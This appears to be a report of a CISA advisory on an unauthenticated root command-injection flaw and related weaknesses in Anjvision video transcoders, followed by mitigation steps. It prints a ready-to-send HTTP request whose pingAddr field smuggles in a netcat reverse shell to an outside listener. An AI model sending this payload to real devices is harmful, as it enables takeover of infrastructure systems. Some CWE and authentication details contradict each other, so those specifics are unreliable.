The Cybersecurity and Infrastructure Security Agency (CISA) has issued an emergency industrial control systems advisory (ICSA-26-272-05) detailing a cluster of critical vulnerabilities affecting Anjvision YSSD-RTMP-H5 series hardware video streaming encoders and transcoders. The most severe flaw, designated CVE-2026-100291 (CVSS 9.8, CWE-78), permits unauthenticated remote adversaries to execute arbitrary OS commands with full root privileges via crafted HTTP requests directed at internal web management binaries.
Physical Security & Industrial OT Convergence Risks
The Anjvision YSSD-RTMP-H5 hardware appliance is widely installed across critical infrastructure installations—including transportation hubs, maritime ports, electric utility perimeters, and municipal surveillance centers—to encode live HDMI, SDI, and RTSP video streams into H.264/H.265 transport streams for remote operations centers (ROCs) and SCADA human-machine interfaces (HMIs).
Because these transcoders bridge physical security camera networks with operational technology IP subnets, compromising the hardware gives threat actors a direct pivot point into industrial automation networks, bypassing traditional perimeter firewalls.
Vulnerability Mechanics: CGI Parameter Command Injection
The web administration interface of the YSSD-RTMP-H5 runs an embedded GoAhead web server that dispatches incoming administrative requests to compiled CGI routines located in /goform/.
Analysis of the /goform/sysTools endpoint reveals that the firmware fails to validate authentication cookies or tokens prior to parsing diagnostic parameters such as pingAddr and tracerouteAddr. The parameters are extracted from the HTTP POST body and formatted directly into an unsafe system() call:
// Decompiled routine from firmware /bin/webserver CGI handler:
int handle_sysTools(webs_t wp) {
char *ping_ip = websGetVar(wp, "pingAddr", "");
char cmd_buffer[512];
// No session check; no shell escaping or character validation!
snprintf(cmd_buffer, sizeof(cmd_buffer), "ping -c 3 %s > /tmp/ping.log 2>&1", ping_ip);
system(cmd_buffer); // Executed directly in /bin/sh as root
return 0;
}
An attacker sends a simple HTTP POST request containing shell command separators (such as semicolons or command substitutions) to spawn a root reverse shell back to an external listener:
POST /goform/sysTools HTTP/1.1
Host: 192.168.1.100
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 72
pingAddr=127.0.0.1;mkfifo+/tmp/p;cat+/tmp/p|/bin/sh+-i+2>&1|nc+10.0.0.5+4444+>/tmp/p
Cluster of Accompanying Firmware Weaknesses
CISA advisory ICSA-26-272-05 documents that CVE-2026-100291 is compounded by several accompanying security defects:
- Cleartext Credential Disclosure (CVE-2026-100292, CWE-312): The endpoint
/goform/getUserInforeturns the complete list of system usernames, hashed passwords, and RTSP stream credentials to unauthenticated requesters. - Unsigned Firmware Upload (CVE-2026-100293, CWE-434): The firmware upgrade routine accepts raw binary tarballs without cryptographic signatures, allowing adversaries who have gained root shell access to permanently flash weaponized persistent rootkits.
- Hardcoded Diagnostic Credentials (CVE-2026-100294, CWE-798): Factory firmware images contain undocumented Telnet credentials that remain active even when Telnet access is disabled in the web GUI.
| CVE ID | Vulnerability Type | CVSS Score | Authentication Required | Operational Impact |
|---|---|---|---|---|
| CVE-2026-100291 | OS Command Injection (CWE-78) | 9.8 Critical | No (Unauthenticated) | Full root operating system compromise |
| CVE-2026-100292 | Information Disclosure (CWE-200) | 7.5 High | No (Unauthenticated) | Plaintext retrieval of admin passwords |
| CVE-2026-100293 | Unrestricted File Upload (CWE-434) | 9.8 Critical | No (Unauthenticated) | Persistent malicious firmware flashing |
| CVE-2026-100294 | Hard-Coded Credentials (CWE-798) | 8.8 High | Static Vendor Account | Direct Telnet root console access |
Operational Containment & Mitigation Strategy
Asset owners and operators in transportation, energy, and physical facility security should immediately execute the following defensive measures:
1. Strict Purdue Model Network Isolation
Immediately isolate all video encoders and transcoders within dedicated physical security VLANs (Purdue Level 2/3). Under no circumstances should administrative HTTP/HTTPS (ports 80, 443, 8080) or streaming ports (554, 1935) be exposed to corporate networks or the public internet.
2. Apply Vendor Firmware Patches
Contact Anjvision technical support to obtain updated firmware build v3.1.2026R or higher. Prior to flashing, verify cryptographic hashes via out-of-band communication with vendor representatives.
3. Firewall Access Control Lists (ACLs)
Enforce host-based and switch-based ACLs that restrict HTTP management access strictly to designated physical security operator jump hosts:
# Example iptables / switch ACL rule:
iptables -A INPUT -p tcp -s 10.10.50.25 --dport 80 -j ACCEPT
iptables -A INPUT -p tcp --dport 80 -j DROP



